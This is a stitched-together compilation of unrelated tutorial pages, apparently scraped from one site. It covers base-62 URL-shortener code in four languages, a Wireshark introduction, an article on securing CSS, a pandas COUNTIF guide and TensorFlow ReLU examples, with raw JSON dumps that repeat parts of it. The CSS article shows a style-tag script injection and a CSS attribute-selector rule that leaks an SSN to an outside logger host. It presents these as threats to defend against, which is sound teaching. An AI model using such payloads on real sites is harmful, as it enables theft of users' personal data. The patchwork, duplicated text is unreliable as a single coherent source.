            if ('A' <= shortURL.charAt(i) && shortURL.charAt(i) <= 'Z')
                id = id * 62 + shortURL.charAt(i) - 'A' + 26;
            if ('0' <= shortURL.charAt(i) && shortURL.charAt(i) <= '9')
                id = id * 62 + shortURL.charAt(i) - '0' + 52;
        }
        return id;
    }

    // Driver Code
    public static void main (String[] args) throws IOException
    {
        int n = 12345;
        String shorturl = idToShortURL(n);
        System.out.println("Generated short url is " + shorturl);
        System.out.println("Id from url is " + shortURLtoID(shorturl));
    }
}

// This code is contributed by shubham96301

# Python3 code for above approach

def idToShortURL(id):
    map = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    shortURL = ""

    # for each digit find the base 62
    while(id > 0):
        shortURL += map[id % 62]
        id //= 62

    # reversing the shortURL
    return shortURL[len(shortURL): : -1]

def shortURLToId(shortURL):
    id = 0
    for i in shortURL:
        val_i = ord(i)
        if(val_i >= ord('a') and val_i <= ord('z')):
            id = id*62 + val_i - ord('a')
        elif(val_i >= ord('A') and val_i <= ord('Z')):
            id = id*62 + val_i - ord('A') + 26
        else:
            id = id*62 + val_i - ord('0') + 52
    return id

if (__name__ == "__main__"):
    id = 12345
    shortURL = idToShortURL(id)
    print("Short URL from 12345 is : ", shortURL)
    print("ID from", shortURL, "is : ", shortURLToId(shortURL))

// C# program to generate short url from integer id and
// integer id back from short url.
using System;

public class GFG {

    // Function to generate a short url from integer ID
    static String idToShortURL(int n)
    {
        // Map to store 62 possible characters
        char []map = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789".ToCharArray();

        String shorturl = "";

        // Convert given integer id to a base 62 number
        while (n > 0)
        {
            // use above map to store actual character
            // in short url
            shorturl += (map[n % 62]);
            n = n / 62;
        }

        // Reverse shortURL to complete base conversion
        return reverse(shorturl);
    }

    static String reverse(String input)
    {
        char[] a = input.ToCharArray();
        int l, r = a.Length - 1;
        for (l = 0; l < r; l++, r--)
        {
            char temp = a[l];
            a[l] = a[r];
            a[r] = temp;
        }
        return String.Join("", a);
    }

    // Function to get integer ID back from a short url
    static int shortURLtoID(String shortURL)
    {
        int id = 0; // initialize result

        // A simple base conversion logic
        for (int i = 0; i < shortURL.Length; i++)
        {
            if ('a' <= shortURL[i] && shortURL[i] <= 'z')
                id = id * 62 + shortURL[i] - 'a';
            if ('A' <= shortURL[i] && shortURL[i] <= 'Z')
                id = id * 62 + shortURL[i] - 'A' + 26;
            if ('0' <= shortURL[i] && shortURL[i] <= '9')
                id = id * 62 + shortURL[i] - '0' + 52;
        }
        return id;
    }

    // Driver Code
    public static void Main(String[] args)
    {
        int n = 12345;
        String shorturl = idToShortURL(n);
        Console.WriteLine("Generated short url is " + shorturl);
        Console.WriteLine("Id from url is " + shortURLtoID(shorturl));
    }
}

// This code is contributed by 29AjayKumar

<script>
// Javascript program to generate short url from integer id and
// integer id back from short url.

// Function to generate a short url from integer ID
function idToShortURL(n)
{
    // Map to store 62 possible characters
    let map = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";

    let shorturl = [];

    // Convert given integer id to a base 62 number
    while (n)
    {
        // use above map to store actual character
        // in short url
        shorturl.push(map[n % 62]);
        n = Math.floor(n / 62);
    }

    // Reverse shortURL to complete base conversion
    shorturl.reverse();
    return shorturl.join("");
}

// Function to get integer ID back from a short url
function shortURLtoID(shortURL)
{
    let id = 0; // initialize result

    // A simple base conversion logic
    for (let i = 0; i < shortURL.length; i++)
    {
        if ('a' <= shortURL[i] && shortURL[i] <= 'z')
            id = id * 62 + shortURL[i].charCodeAt(0) - 'a'.charCodeAt(0);
        if ('A' <= shortURL[i] && shortURL[i] <= 'Z')
            id = id * 62 + shortURL[i].charCodeAt(0) - 'A'.charCodeAt(0) + 26;
        if ('0' <= shortURL[i] && shortURL[i] <= '9')
            id = id * 62 + shortURL[i].charCodeAt(0) - '0'.charCodeAt(0) + 52;
    }
    return id;
}

// Driver program to test above function
let n = 12345;
let shorturl = idToShortURL(n);
document.write("Generated short url is " + shorturl + "<br>");
document.write("Id from url is " + shortURLtoID(shorturl));

// This code is contributed by gfgking.
</script>

Output:

Generated short url is dnh
Id from url is 12345

Time Complexity: O(log n), one step per base-62 digit of the id.
Auxiliary Space: O(1) beyond the generated short string.

Optimization: We can avoid the reverse step in idToShortURL(). To make sure that we get the same ID back, we also need to change shortURLtoID() to process characters from the end instead of the beginning.
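A minimal C++ sketch of that optimization (same 62-character map and character-to-value logic as above; the function names are just illustrative): the short URL simply keeps its least significant digit first, and the decoder walks the string backwards.

// Sketch of the "no reverse" variant: digits are kept least-significant first.
#include <string>
using namespace std;

string idToShortURLNoReverse(long int n)
{
    const char map[] = "abcdefghijklmnopqrstuvwxyz"
                       "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
    string shorturl;
    while (n) {                       // append digits without reversing
        shorturl.push_back(map[n % 62]);
        n /= 62;
    }
    return shorturl;                  // least significant character comes first
}

long int shortURLtoIDNoReverse(const string& s)
{
    long int id = 0;
    for (int i = s.length() - 1; i >= 0; i--) {   // walk from the end
        int val = ('a' <= s[i] && s[i] <= 'z') ? s[i] - 'a'
                : ('A' <= s[i] && s[i] <= 'Z') ? s[i] - 'A' + 26
                : s[i] - '0' + 52;
        id = id * 62 + val;
    }
    return id;
}

For id 12345 this produces "hnd" instead of "dnh", and decoding it from the end yields 12345 again.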
Introduction to Wireshark
02 Dec, 2021

Wireshark is a software tool used to monitor the network traffic through a network interface. It is the most widely used network monitoring tool today. Wireshark is loved equally by system administrators, network engineers, network enthusiasts, network security professionals and black hat hackers. The extent of its popularity is such that experience with Wireshark is considered a valuable, even essential, trait for a computer-networking professional.

It has a great GUI as well as a conventional CLI (TShark).
It offers network monitoring on almost all types of network standards (ethernet, wlan, Bluetooth etc).
It is open-source with a large community of backers and developers.
All the necessary components for monitoring, analyzing and documenting the network traffic are present.
It is free to use.

Wireshark was started with the intention of developing a tool for closely analyzing network packets. It was started by Gerald Combs in 1997. Its initial name was Ethereal. It was initially released in July 1998 as version 0.2.0. Due to the support it got from the developer community, it grew rapidly and was released as version 1.0 in 2008, almost two years after it was renamed to Wireshark.

Windows : You can do a proper installation or run Wireshark as a portable app on your Windows system. To download the installation executable or the portable app, go to Wireshark Downloads. Run the executable and follow the on-screen instructions to complete the installation.

Linux : Install using your package manager; see the manual for your package manager for the correct syntax. Most Debian-based Linux OS have the apt (advanced packaging tool) package manager pre-installed. Similarly, the Fedora family of OS have the "yum" package manager pre-installed. The generic command is

<package-manager-name> install wireshark

On Ubuntu, open a terminal (or press ALT + CTRL + T) and run the below command:

sudo add-apt-repository ppa:wireshark-dev/stable

Update the repository:

sudo apt-get update

Install Wireshark using the below command:

sudo apt-get install wireshark

To run Wireshark use the below command:

sudo wireshark

You can opt for a security-based Linux OS that has Wireshark pre-installed, like Kali Linux.

Packet Monitor: This segment visually shows the packets flowing inside the network. There are color codes for each type of packet. The packets are shown with the following information:
1. Source address
2. Destination address
3. Packet type
4. Hex dump of the packet
5. Contents of the packet in text
6. Source port (if applicable)
7. Destination port (if applicable)

Import from a capture file: This feature lets you import a packet dump from a capture file to analyse further. There are many formats supported by Wireshark, some of them are:

pcapng
libpcap
Oracle snoop and atmsnoop
Finisar (previously Shomiti) Surveyor captures
Microsoft Network Monitor captures
Novell LANalyzer captures
AIX iptrace captures
Cinco Networks NetXray captures
Network Associates Windows-based Sniffer and Sniffer Pro captures
Network General/Network Associates DOS-based Sniffer (compressed or uncompressed) captures
AG Group/WildPackets/Savvius EtherPeek/TokenPeek/AiroPeek/EtherHelp/PacketGrabber captures
RADCOM's WAN/LAN Analyzer captures
Network Instruments Observer version 9 captures
Lucent/Ascend router debug output
HP-UX's nettl
Toshiba's ISDN routers dump output
ISDN4BSD i4btrace utility
Traces from the EyeSDN USB S0
IPLog format from the Cisco Secure Intrusion Detection System
the output from VMS's TCPIPtrace/TCPtrace/UCX$TRACE utilities
the text output from the DBS Etherwatch VMS utility
Visual Networks' Visual UpTime traffic capture
the output from CoSine L2 debug
the output from Accellent's 5Views LAN agents
Endace Measurement Systems' ERF format captures
Linux Bluez Bluetooth stack hcidump -w traces
Catapult DCT2000 .out files
Gammu generated text output from Nokia DCT3 phones in Netmonitor mode
IBM Series (OS/400) Comm traces (ASCII & UNICODE)
Juniper Netscreen snoop captures
Symbian OS btsnoop captures
Tamosoft CommView captures
Textronix K12xx 32bit .rf5 format captures
Textronix K12 text file format captures
Apple PacketLogger captures
Captures from Aethra Telecommunications' PC108 software

Export to a capture file: Wireshark lets you save the results as a capture file to continue working on them at a later point of time. The supported formats are:

pcapng (*.pcapng)
libpcap, tcpdump and various other tools using tcpdump's capture format (*.pcap, *.cap, *.dmp)
Accellent 5Views (*.5vw)
HP-UX's nettl (*.TRC0, *.TRC1)
Microsoft Network Monitor - NetMon (*.cap)
Network Associates Sniffer - DOS (*.cap, *.enc, *.trc, *fdc, *.syc)
Network Associates Sniffer - Windows (*.cap)
Network Instruments Observer version 9 (*.bfr)
Novell LANalyzer (*.tr1)
Oracle (previously Sun) snoop (*.snoop, *.cap)
Visual Networks Visual UpTime traffic (*.*)

As a beginner, you should focus only on familiarising yourself with the basics of the Wireshark UI (the formats listed here are just for a glance; you don't have to do anything with them at this time). With these basics done you can now start playing around with the tool. Launch Wireshark, select an interface (select one that is currently communicating, which can be verified by the zigzag pattern in front of the name of the interface) and click on the fin icon to start capturing packets. Save the result as a capture file and exit after you are done seeing the traffic. This concludes the fundamentals.
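For the TShark CLI mentioned above, a couple of illustrative commands can show the same capture-and-save workflow from a terminal (the interface name eth0 is only an example; you can list your own interfaces with tshark -D):

# capture 100 packets from interface eth0 and save them to a capture file
tshark -i eth0 -c 100 -w sample.pcapng

# read the saved capture back and show only HTTP packets
tshark -r sample.pcapng -Y "http"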
How to secure cascading style sheets?
14 Jun, 2022

Before learning how to secure cascading style sheets, let us first explore the threats that can arise through cascading style sheets.

Threat 1: Assume that we are using embedded/internal CSS in our code and that we allow the user some CSS customization. There is then a chance that the attacker could inject JavaScript code by closing the style tag inside the customizable internal CSS. Refer to the snippet below for a better understanding.

Code snippet:

<style>
/* If you have added the flexibility to customize the CSS by the user */
/* Customizable CSS */
</style>

The attacker could add malicious JavaScript code by closing the style tag and adding a script tag as shown below.

<style>
</style>
<script>
// Some malicious JavaScript code
</script>
<style>
</style>

This occurs only in rare cases, as users are not always given the flexibility to customize the cascading style sheets.

Threat 2: Suppose you are logged in to a website that displays some sensitive information such as a social security number (SSN). There is then a chance that the attacker can extract that sensitive information by using CSS attribute selectors.

Code:

input#ssn[value="999-888-777"] {
   background-image: url(
"https://secret-site.com/logger.php?ssn=999-888-777");
}

How to secure cascading style sheets?

Proper access control level: Keep the CSS behind the proper access control level. By "access control level" we mean that a normal user gets a different CSS file than an administrator. Care should be taken that those CSS files are accessible only to users with the proper access control level or authentication.

CSS Obfuscation: CSS obfuscation makes the CSS unclear or confusing to an attacker. It can be done using the following websites:

http://cssobfuscator.com/
https://www.uglifycss.com/

Implementing the Content Security Policy (CSP): A Content Security Policy (CSP) helps to detect many types of attacks such as data injection attacks and cross-site scripting (XSS). In this way, an extra layer of security is added against data theft, malware distribution and the replacement of your own content. You can configure CSP by using the meta tag as shown below.

<meta http-equiv="Content-Security-Policy"
charset="UTF-8" content="default-src 'self';
img-src 'self' img.example.com;">

Scanning the website with a vulnerability scanner: Scanning your website with a vulnerability scanner is a best practice; these scanners not only detect CSS or XSS injections but also point out other possible vulnerabilities in your website. Some online vulnerability scanners are:

https://pentest-tools.com/website-vulnerability-scanning/website-scanner
https://sitecheck.sucuri.net/
https://www.netsparker.com/web-vulnerability-scanner/

These are some of the techniques for securing your cascading style sheets.
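In practice, a CSP is often delivered as an HTTP response header rather than (or in addition to) a meta tag, since a header also covers responses without an HTML body. As a complement to the meta-tag approach above, here is a minimal hedged sketch of sending such a policy from a Flask application; the app, the route and the policy string are illustrative assumptions, not part of the original article, and the policy must be tailored to your own site.

# Minimal sketch: serving a Content-Security-Policy header from Flask (illustrative only).
from flask import Flask

app = Flask(__name__)

@app.after_request
def add_csp_header(response):
    # Restrict resources to our own origin; an example policy, not a recommendation.
    response.headers["Content-Security-Policy"] = (
        "default-src 'self'; img-src 'self' img.example.com; style-src 'self'"
    )
    return response

@app.route("/")
def index():
    return "Hello, CSP!"

if __name__ == "__main__":
    app.run()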
[ { "code": null, "e": 28, "s": 0, "text": "\n14 Jun, 2022" }, { "code": null, "e": 172, "s": 28, "text": "Before learning how to secure cascading style sheets, let us first explore what are the threats that would cause through cascading stylesheets." }, { "code": null, "e": 432, "s": 172, "text": "Threat 1: Let us assume that we are using embedded/internal CSS in our code and you are allowing a user some CSS customization, then there is a chance that the attacker could inject a JavaScript code by closing the style tag in the customizable internal CSS. " }, { "code": null, "e": 486, "s": 432, "text": "Refer to the below snippet for better understanding. " }, { "code": null, "e": 500, "s": 486, "text": "Code snippet:" }, { "code": null, "e": 617, "s": 500, "text": "<style>\n\n/* If you have added the flexibility to \n customize the CSS by the user */\n\n/* Customizable CSS\n\n</style>" }, { "code": null, "e": 733, "s": 617, "text": "The attacker could add a malicious JavaScript code by closing the style tag and adding a script tag as shown below." }, { "code": null, "e": 825, "s": 733, "text": " \n<style>\n\n</style>\n<script>\n\n// Some malicious JavaScript code\n</script>\n<style>\n\n</style>" }, { "code": null, "e": 944, "s": 825, "text": "This occurs in a rare case as a user might not be given the flexibility to customize the cascading stylesheets always." }, { "code": null, "e": 1198, "s": 944, "text": "Threat 2: Suppose you are logged in to a website and that the site displays some sensitive information like social-security-number (ssn), then there is a chance that the attacker can get those sensitive information by using the CSS Attribute selectors. " }, { "code": null, "e": 1204, "s": 1198, "text": "Code:" }, { "code": null, "e": 1322, "s": 1204, "text": "input#ssn[value=\"999-888-777\"] { \n background-image: url(\n\"https://secret-site.com/logger.php?ssn=999-888-777\");\n}" }, { "code": null, "e": 1360, "s": 1322, "text": "How to secure cascading stylesheets ?" }, { "code": null, "e": 1735, "s": 1360, "text": "Proper access control level: Keep the CSS away from the access control level. By the term “Access control level” it means that the normal user will have a different CSS file while the administrator has a different CSS file. Proper care should be taken for those respective CSS files that are accessible only for a user with the proper access control level or authentication." }, { "code": null, "e": 1897, "s": 1735, "text": "CSS Obfuscation: The method CSS Obfuscation is to make the CSS unclear or confusing to the attacker. CSS Obfuscation can be done by using the following websites." }, { "code": null, "e": 1950, "s": 1897, "text": "http://cssobfuscator.com/\nhttps://www.uglifycss.com/" }, { "code": null, "e": 2270, "s": 1950, "text": "Implementing the Content Security Policy (CSP): Content Security Policy (CSP) helps to detect many types of attacks like data injection attacks and cross site scripting (XSS). By this way, an extra layer of security is given from data theft, malware distribution and replacing your own contents to some stolen websites." }, { "code": null, "e": 2330, "s": 2270, "text": "You can configure CSP by using the meta tag as shown below." 
}, { "code": null, "e": 2452, "s": 2330, "text": "<meta http-equiv=\"Content-Security-Policy\"\ncharset=\"UTF-8\" content=\"default-src 'self';\nimg-src 'self' img.example.com;\">" }, { "code": null, "e": 2687, "s": 2452, "text": "Scanning website with vulnerability scanner: Scanning your website with a vulnerability scanner is a best practice, these scanner not just detect CSS or XSS injections, but also showcase other possible vulnerabilities in your website." }, { "code": null, "e": 2733, "s": 2687, "text": "Some of the online vulnerability scanners are" }, { "code": null, "e": 2890, "s": 2733, "text": "https://pentest-tools.com/website-vulnerability-scanning/website-scanner https://sitecheck.sucuri.net/ https://www.netsparker.com/web-vulnerability-scanner/" }, { "code": null, "e": 2964, "s": 2890, "text": "These are some of the techniques for securing your cascading stylesheets." }, { "code": null, "e": 2973, "s": 2964, "text": "rkbhola5" }, { "code": null, "e": 2982, "s": 2973, "text": "CSS-Misc" }, { "code": null, "e": 2986, "s": 2982, "text": "CSS" }, { "code": null, "e": 3003, "s": 2986, "text": "Web Technologies" } ]
How to Perform a COUNTIF Function in Python?
28 Nov, 2021

In this article, we will discuss how to perform a COUNTIF function in Python.

We use this function to count the elements if a condition is satisfied. Notice that the word stands for COUNT + IF: we want to count an element only if the condition that is provided is satisfied.

Approach

We will have a DataFrame with some columns.
We will use the function sum(). The sum() function will take an iterable value. We will have a data frame with columns containing a list of elements. Then we will pass the condition to check whether the current element satisfies it or not.
sum() returns an integer value, so we will store the value and print it.

Syntax

The syntax of the sum() call is as follows:

sum(data-list condition)

Let us take an example where we have a list of integer values stored as a pandas Series (or NumPy array) called myList. We want the number of items greater than or equal to 40, so we can use the sum function as follows:

sum(myList >= 40)

For using two conditions, we can use either AND ( & ) or OR ( | ) to separate the two conditions; note that each condition must be wrapped in parentheses because & and | bind more tightly than the comparison operators:

sum((myList >= 40) & (myList <= 90))  # AND
sum((myList >= 40) | (myList <= 90))  # OR

First, let us create a DataFrame. Here we have two columns, which are views and likes. We will keep the length of each column the same.

Python3

import pandas as pd

# create a dictionary
my_data = {"views": [12, 13, 100, 80, 91],
           "likes": [3, 8, 23, 17, 56]}

# convert to dataframe
my_df = pd.DataFrame(my_data)

We will use the sum() function to check if, in the list of the views column, the values are greater than 30. The sum function will then count the rows that have corresponding views greater than 30.

Python3

import pandas as pd

# Data
my_data = {"views": [12, 13, 100, 80, 91],
           "likes": [3, 8, 23, 17, 56]}
my_df = pd.DataFrame(my_data)

# Printing the DataFrame
print(my_df.to_string())

# Printing the number of views greater than 30
print("View greater than 30: ", sum(my_df.views > 30))

Output

The sum() function can also check if, in the list of the likes column, the values are greater than 20. The sum function will then count the rows that have corresponding likes greater than 20.

Python3

import pandas as pd

# Data
my_data = {"views": [12, 13, 100, 80, 91],
           "likes": [3, 8, 23, 17, 56]}
my_df = pd.DataFrame(my_data)

# Printing the DataFrame
print(my_df.to_string())

# Printing the number of likes greater than 20
print("Likes greater than 20: ", sum(my_df.likes > 20))

Output

For satisfying two or more conditions, wrap each condition in brackets ( ) and then use a single & sign to separate them. Here we have only two conditions, so we need only one &.

Python3

import pandas as pd

# Data
my_data = {"views": [12, 13, 100, 80, 91],
           "likes": [3, 8, 23, 17, 56]}
my_df = pd.DataFrame(my_data)

# Printing the DataFrame
print(my_df.to_string())

# Calculating the number of views greater than 30
# as well as likes less than 20
count = sum((my_df.likes < 20) & (my_df.views > 30))  # avoid shadowing the built-in sum()
print("Likes less than 20 and Views more than 30: ", count)

Output

We will use a single | sign to separate the conditions. | is read as: either the first condition OR the second OR the third, and so on.

Python3

import pandas as pd

# Data
my_data = {"views": [12, 13, 100, 80, 91],
           "likes": [3, 8, 23, 17, 56]}
my_df = pd.DataFrame(my_data)

# Printing the DataFrame
print(my_df.to_string())

# Calculating the number of views greater than 30
# or likes less than 20
count = sum((my_df.likes < 20) | (my_df.views > 30))  # avoid shadowing the built-in sum()
print("Likes less than 20 or Views more than 30: ", count)

Output
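The examples above all use inequality conditions. The closest analogue of a spreadsheet COUNTIF with an exact-match criterion works the same way, by summing a boolean comparison. The following small sketch uses made-up data purely for illustration; it is not part of the original article.

import pandas as pd

# Hypothetical data, only for illustration
df = pd.DataFrame({"likes": [3, 8, 23, 8, 56, 8]})

# COUNTIF(likes, 8): count rows whose value equals 8 exactly (3 for this data)
print("likes equal to 8:", sum(df.likes == 8))       # same style as above
print("likes equal to 8:", (df.likes == 8).sum())    # equivalent pandas idiom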
[ { "code": null, "e": 28, "s": 0, "text": "\n28 Nov, 2021" }, { "code": null, "e": 106, "s": 28, "text": "In this article, we will discuss how to perform a COUNTIF function in Python." }, { "code": null, "e": 311, "s": 106, "text": "We use this function to count the elements if the condition is satisfied. Notice that the word stands as COUNT + IF. That means we want to count the element if the condition that is provided is satisfied." }, { "code": null, "e": 320, "s": 311, "text": "Approach" }, { "code": null, "e": 364, "s": 320, "text": "We will have a DataFrame with some columns." }, { "code": null, "e": 604, "s": 364, "text": "We will use the function sum(). The sum() function will take an Iterable value. We will have a data frame with columns containing a list of elements. Then we will pass the condition to check whether the current element satisfies it or not." }, { "code": null, "e": 677, "s": 604, "text": "sum() returns an integer value. So we will store the value and print it." }, { "code": null, "e": 684, "s": 677, "text": "Syntax" }, { "code": null, "e": 732, "s": 684, "text": "The syntax of the sum() function is as follows." }, { "code": null, "e": 757, "s": 732, "text": "sum(data-list condition)" }, { "code": null, "e": 953, "s": 757, "text": "Let us take an example where we have a list called myList and in the list, there are integer values. We want the number of items greater than equals 40. So we can use the sum function as follows," }, { "code": null, "e": 971, "s": 953, "text": "sum(mylist >= 40)" }, { "code": null, "e": 1070, "s": 971, "text": "For using two conditions, we can either use AND( & ) or OR( | ) for separating the two conditions." }, { "code": null, "e": 1155, "s": 1070, "text": "sum((myList) >= 40 & (myList <= 90)) # AND\nsum((myList) >= 40 | (myList <= 90)) # OR" }, { "code": null, "e": 1291, "s": 1155, "text": "First, let us create a DataFrame. Here we have two columns, which are views and likes. We will keep the length of each column the same." }, { "code": null, "e": 1299, "s": 1291, "text": "Python3" }, { "code": "# create a dictionarymy_data = {\"views\": [12, 13, 100, 80, 91], \"likes\": [3, 8, 23, 17, 56]} # convert to dataframemy_df = pd.DataFrame(my_data)", "e": 1455, "s": 1299, "text": null }, { "code": null, "e": 1649, "s": 1455, "text": "We will use the sum() function to check if, in the list of views column, the values are greater than 30. Then the sum function will count the rows that have corresponding views greater than 30." }, { "code": null, "e": 1657, "s": 1649, "text": "Python3" }, { "code": "import pandas as pd # Datamy_data = {\"views\": [12, 13, 100, 80, 91], \"likes\": [3, 8, 23, 17, 56]}my_df = pd.DataFrame(my_data) # Printing the DataFrameprint(my_df.to_string()) # Printing the number of views greater# than 30print(\"View greater than 30: \", sum(my_df.views > 30))", "e": 1954, "s": 1657, "text": null }, { "code": null, "e": 1961, "s": 1954, "text": "Output" }, { "code": null, "e": 2143, "s": 1961, "text": "The sum() function to check if, in the list of likes column, the values are greater than 20. Then the sum function will count the rows that have corresponding likes greater than 20." 
}, { "code": null, "e": 2151, "s": 2143, "text": "Python3" }, { "code": "import pandas as pd # Datamy_data = {\"views\": [12, 13, 100, 80, 91], \"likes\": [3, 8, 23, 17, 56]}my_df = pd.DataFrame(my_data) # Printing the DataFrameprint(my_df.to_string()) # Printing the number of likes greater# than 20print(\"Likes greater than 20: \", sum(my_df.likes > 20))", "e": 2449, "s": 2151, "text": null }, { "code": null, "e": 2456, "s": 2449, "text": "Output" }, { "code": null, "e": 2632, "s": 2456, "text": "For satisfying two or more conditions, wrap each condition in brackets( ) and then use single & sign to separate them. Here we have only two conditions, so we need only one &." }, { "code": null, "e": 2640, "s": 2632, "text": "Python3" }, { "code": "import pandas as pd # Datamy_data = {\"views\": [12, 13, 100, 80, 91], \"likes\": [3, 8, 23, 17, 56]}my_df = pd.DataFrame(my_data) # DataFrame # Printing the DataFrameprint(my_df.to_string()) # Calculating the number of views greater than 30# as well as likes less than 20sum = sum((my_df.likes < 20) & (my_df.views > 30))print(\"Likes less than 20 and Views more than 30: \", sum)", "e": 3020, "s": 2640, "text": null }, { "code": null, "e": 3027, "s": 3020, "text": "Output" }, { "code": null, "e": 3153, "s": 3027, "text": "We will use a single | sign to separate the conditions. | is used as either the first condition OR second OR third and so on." }, { "code": null, "e": 3161, "s": 3153, "text": "Python3" }, { "code": "import pandas as pd # Datamy_data = {\"views\": [12, 13, 100, 80, 91], \"likes\": [3, 8, 23, 17, 56]}my_df = pd.DataFrame(my_data) # DataFrame # Printing the DataFrameprint(my_df.to_string()) # Calculating the number of views greater than 30# or likes less than 20sum = sum((my_df.likes < 20) | (my_df.views > 30))print(\"Likes less than 20 or Views more than 30: \", sum)", "e": 3532, "s": 3161, "text": null }, { "code": null, "e": 3539, "s": 3532, "text": "Output" }, { "code": null, "e": 3546, "s": 3539, "text": "Picked" }, { "code": null, "e": 3560, "s": 3546, "text": "Python-pandas" }, { "code": null, "e": 3567, "s": 3560, "text": "Python" } ]
Python | Tensorflow nn.relu() and nn.leaky_relu()
13 Sep, 2018

Tensorflow is an open-source machine learning library developed by Google. One of its applications is to develop deep neural networks. The module tensorflow.nn provides support for many basic neural network operations.

An activation function is a function which is applied to the output of a neural network layer, which is then passed as the input to the next layer. Activation functions are an essential part of neural networks as they provide non-linearity, without which the neural network reduces to a mere logistic regression model. The most widely used activation function is the Rectified Linear Unit (ReLU). ReLU is defined as f(x) = max(0, x). ReLU has become a popular choice in recent times due to the following reasons:

Computationally faster: The ReLU is a highly simplified function which is easily computed.

Fewer vanishing gradients: In machine learning, the update to a parameter is proportional to the partial derivative of the error function with respect to that parameter. If the gradient becomes extremely small, the updates will not be effective and the network might stop training altogether. The ReLU does not saturate in the positive direction, whereas other activation functions like sigmoid and hyperbolic tangent saturate in both directions. Therefore, it has fewer vanishing gradients, resulting in better training.

The function nn.relu() provides support for the ReLU in Tensorflow.

Syntax: tf.nn.relu(features, name=None)

Parameters:
features: A tensor of any of the following types: float32, float64, int32, uint8, int16, int8, int64, bfloat16, uint16, half, uint32, uint64.
name (optional): The name for the operation.

Return type: A tensor with the same type as that of features.

# Importing the Tensorflow library
import tensorflow as tf

# A constant vector of size 6
a = tf.constant([1.0, -0.5, 3.4, -2.1, 0.0, -6.5], dtype = tf.float32)

# Applying the ReLu function and
# storing the result in 'b'
b = tf.nn.relu(a, name ='ReLU')

# Initiating a Tensorflow session
with tf.Session() as sess:
    print('Input type:', a)
    print('Input:', sess.run(a))
    print('Return type:', b)
    print('Output:', sess.run(b))

Output:

Input type: Tensor("Const_10:0", shape=(6, ), dtype=float32)
Input: [ 1. -0.5  3.4000001 -2.0999999  0. -6.5 ]
Return type: Tensor("ReLU_9:0", shape=(6, ), dtype=float32)
Output: [ 1.  0.  3.4000001  0.  0.  0. ]

Leaky ReLU: The ReLU function suffers from what is called the "dying ReLU" problem. Since the slope of the ReLU function on the negative side is zero, a neuron stuck on that side is unlikely to recover from it. This causes the neuron to output zero for every input, thus rendering it useless. A solution to this problem is to use Leaky ReLU, which has a small slope on the negative side.

The function nn.leaky_relu() provides support for the Leaky ReLU in Tensorflow.

Syntax: tf.nn.leaky_relu(features, alpha, name=None)

Parameters:
features: A tensor of any of the following types: float32, float64, int32, uint8, int16, int8, int64, bfloat16, uint16, half, uint32, uint64.
alpha: The slope of the function for x < 0. Default value is 0.2.
name (optional): The name for the operation.

Return type: A tensor with the same type as that of features.

# Importing the Tensorflow library
import tensorflow as tf

# A constant vector of size 6
a = tf.constant([1.0, -0.5, 3.4, -2.1, 0.0, -6.5], dtype=tf.float32)

# Applying the Leaky ReLu function with
# slope 0.01 and storing the result in 'b'
b = tf.nn.leaky_relu(a, alpha=0.01, name='Leaky_ReLU')

# Initiating a Tensorflow session
with tf.Session() as sess:
    print('Input type:', a)
    print('Input:', sess.run(a))
    print('Return type:', b)
    print('Output:', sess.run(b))

Output:

Input type: Tensor("Const_2:0", shape=(6,), dtype=float32)
Input: [ 1. -0.5  3.4000001 -2.0999999  0. -6.5 ]
Return type: Tensor("Leaky_ReLU_1/Maximum:0", shape=(6,), dtype=float32)
Output: [ 1. -0.005  3.4000001 -0.021  0. -0.065 ]
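The listings above use the TensorFlow 1.x Session API that was current when this article was written. In TensorFlow 2.x both activation ops still exist and run eagerly, so no session is needed. The following is a small sketch of the same computation under the assumption that a TensorFlow 2.x installation is available.

# Sketch assuming TensorFlow 2.x (eager execution is the default)
import tensorflow as tf

a = tf.constant([1.0, -0.5, 3.4, -2.1, 0.0, -6.5], dtype=tf.float32)

# ReLU: negative entries become 0
print(tf.nn.relu(a).numpy())

# Leaky ReLU with slope 0.01 on the negative side
print(tf.nn.leaky_relu(a, alpha=0.01).numpy())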
[ { "code": null, "e": 28, "s": 0, "text": "\n13 Sep, 2018" }, { "code": null, "e": 249, "s": 28, "text": "Tensorflow is an open-source machine learning library developed by Google. One of its applications is to developed deep neural networks. The module tensorflow.nn provides support for many basic neural network operations." }, { "code": null, "e": 746, "s": 249, "text": "An activation function is a function which is applied to the output of a neural network layer, which is then passed as the input to the next layer. Activation functions are an essential part of neural networks as they provide non-linearity, without which the neural network reduces to a mere logistic regression model. The most widely used activation function is the Rectified Linear Unit (ReLU). ReLU is defined as . ReLU has become a popular choice in recent times due to the following reasons:" }, { "code": null, "e": 837, "s": 746, "text": "Computationally faster: The ReLU is a highly simplified function which is easily computed." }, { "code": null, "e": 1355, "s": 837, "text": "Fewer vanishing gradients: In machine learning, the update to a parameter is proportional to the partial derivative of the error function with respect to that parameters. If the gradient becomes extremely small, the updates will not be effective and the network might stop training at all. The ReLU does not saturate in the positive direction, whereas other activation functions like sigmoid and hyperbolic tangent saturate in both directions. Therefore, it has fewer vanishing gradients resulting in better training." }, { "code": null, "e": 1423, "s": 1355, "text": "The function nn.relu() provides support for the ReLU in Tensorflow." }, { "code": null, "e": 1463, "s": 1423, "text": "Syntax: tf.nn.relu(features, name=None)" }, { "code": null, "e": 1660, "s": 1463, "text": "Parameters:features: A tensor of any of the following types: float32, float64, int32, uint8, int16, int8, int64, bfloat16, uint16, half, uint32, uint64.name (optional): The name for the operation." }, { "code": null, "e": 1722, "s": 1660, "text": "Return type: A tensor with the same type as that of features." }, { "code": "# Importing the Tensorflow libraryimport tensorflow as tf # A constant vector of size 6a = tf.constant([1.0, -0.5, 3.4, -2.1, 0.0, -6.5], dtype = tf.float32) # Applying the ReLu function and# storing the result in 'b'b = tf.nn.relu(a, name ='ReLU') # Initiating a Tensorflow sessionwith tf.Session() as sess: print('Input type:', a) print('Input:', sess.run(a)) print('Return type:', b) print('Output:', sess.run(b))", "e": 2154, "s": 1722, "text": null }, { "code": null, "e": 2162, "s": 2154, "text": "Output:" }, { "code": null, "e": 2435, "s": 2162, "text": "Input type: Tensor(\"Const_10:0\", shape=(6, ), dtype=float32)\nInput: [ 1. -0.5 3.4000001 -2.0999999 0. -6.5 ]\nReturn type: 